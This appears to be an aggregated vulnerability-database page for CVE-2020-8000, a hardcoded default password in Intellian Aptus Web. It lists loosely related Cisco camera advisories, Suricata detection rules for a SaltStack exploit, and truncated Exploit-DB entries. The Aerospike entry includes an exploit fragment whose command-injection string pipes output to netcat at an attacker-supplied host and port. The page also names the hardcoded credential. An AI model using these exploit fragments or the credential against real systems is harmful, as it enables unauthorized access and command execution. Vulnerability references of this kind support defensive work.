CVE-2020-8000
Published: 2020-01-27
CVE-2020-8000: Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.
Priority: P357 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 2.40% (82.0th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliantech | aptus_web | — | — |
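CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_cisco | — | 8.8 | HIGH | — |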
GHSA
GHSA-v56r-cxxj-7vxh: Intellian Aptus Web 1
ghsa_unreviewed·2022-05-24
CVE-2020-8000 [HIGH] GHSA-v56r-cxxj-7vxh: Intellian Aptus Web 1
Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·2020-10-07·CVSS 8.8
CVE-2020-3544 [HIGH] CWE-119 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute arbitrary code on an affected device or cause the device to reload.
This vulnerability is due to missing checks when an IP camera processes a Cisco Discovery Protocol packet. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: Cisco Discove
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·2020-10-07·CVSS 6.5
CVE-2020-3543 [MEDIUM] CWE-400 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device.
The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition.
Note: Cisco Discovery Protocol is a Layer 2 pr
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·2020-08-19·CVSS 6.5
CVE-2020-3505 [MEDIUM] CWE-400 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device.
The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition.
Note: Cisco Discovery Protocol is a Layer 2 pr
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·2020-08-19·CVSS 8.8
CVE-2020-3506 [HIGH] CWE-20 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera.
These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: C
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·2020-02-05·CVSS 8.8
CVE-2020-3110 [HIGH] CWE-20 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for the Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP Camera.
The vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to the targeted IP Camera. A successful exploit could allow the attacker to expose the affected IP Camera for remote code execution or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: Cisco Discov
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3505 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
CVE-2020-3505: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition. Note: Cisco Discovery Protocol is
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3110 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
CVE-2020-3110: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for the Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP Camera. The vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to the targeted IP Camera. A successful exploit could allow the attacker to expose the affected IP Camera for remote code execution or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·CVSS 3.1
CVE-2020-3506 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
CVE-2020-3506: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera. These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condi
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·CVSS 3.1
CVE-2020-3507 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
CVE-2020-3507: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera. These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condi
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3544 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
CVE-2020-3544: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute arbitrary code on an affected device or cause the device to reload. This vulnerability is due to missing checks when an IP camera processes a Cisco Discovery Protocol packet. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note:
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3543 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
CVE-2020-3543: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition. Note: Cisco Discovery Protocol is
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; content:"|22|ssh_priv|22|"; fast_pattern; content:"|22 7c|"; within:5; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060515; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updat
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"|22|ssh_port|22|"; fast_pattern; content:"|22|"; within:4; pcre:"/^[^\x22]+\x2f/R"; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060516; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, signature_severity Major, tag Exploit,
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"ssh_port="; fast_pattern; pcre:"/^[^&]+\x2f/R"; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060514; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Expl
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)
suricata·2021-01-07·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"client=ssh"; fast_pattern; content:"ssh_priv="; content:"%20"; distance:0; reference:cve,2020-16846; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2031495; rev:1; metadata:attack_target Server, created_at 2021_01_07, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Gene
Exploit-DB
Aerospike Database 5.1.0.3 - OS Command Execution
exploitdb·2020-11-17·CVSS 9.8
CVE-2020-13151 [CRITICAL] Aerospike Database 5.1.0.3 - OS Command Execution
---
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: &1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
    try:
        return aerospike.client({
            'hosts': [(cfg.ahost, cfg.aport)],
            'policies': {'timeout': 8000}}).connect()
    except Exception as e:
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
    except Exception as e:
        print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"[-] whoops, couldn't registe
Exploit-DB
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
exploitdb·2020-06-04
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
---
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
# SMP-8000 v3.0
# SMP-6000 v3.0 Build 19025
# SMP-6000 v1.0 Build 14246
# SMP-6000 v1.0 Build 14199
# SMP-6000 v1.0 Build 14167
# SMP-6000 v1.0 Build 14097
# SMP-6000 v1.0 Build 14090
# SMP-6000 v1.0 Build 14069
# SMP-6000 v1.0 Build 14062
# SMP-4000 v1.0 Build 14098
# SMP-4000 v1.0 Build 14092
# SMP-4000 v1.0 Build 14087
# SMP-2310 v3.0
# SMP-2300 v3.0
No writeups or analysis indexed.
2020-01-27
Published